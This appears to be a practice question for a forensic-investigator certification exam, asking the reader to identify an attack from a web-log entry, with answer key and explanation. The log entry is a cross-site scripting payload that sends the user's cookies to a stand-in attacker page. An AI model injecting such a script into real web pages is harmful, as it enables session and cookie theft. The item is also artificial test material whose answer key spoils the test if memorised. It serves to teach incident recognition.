Computer Hacking Forensic Investigator (CHFI v10) — Question 280

You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings:
< SCRIPT type="text/javascript" >
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
< /SCRIPT >
What kind of attack has occurred?

Answer options

Correct answer: A

Explanation

The attack described is indicative of cross-site scripting (XSS), in which malicious scripts are injected into web pages viewed by users. The submitted code reads the user's cookies through document.cookie and appends them to a URL for the attacker's page (evil.php), which is typical cookie-stealing behavior in XSS attacks. The other options (cross-site request forgery, buffer overflow, and SQL injection) rely on different techniques and do not involve injecting scripts into web pages.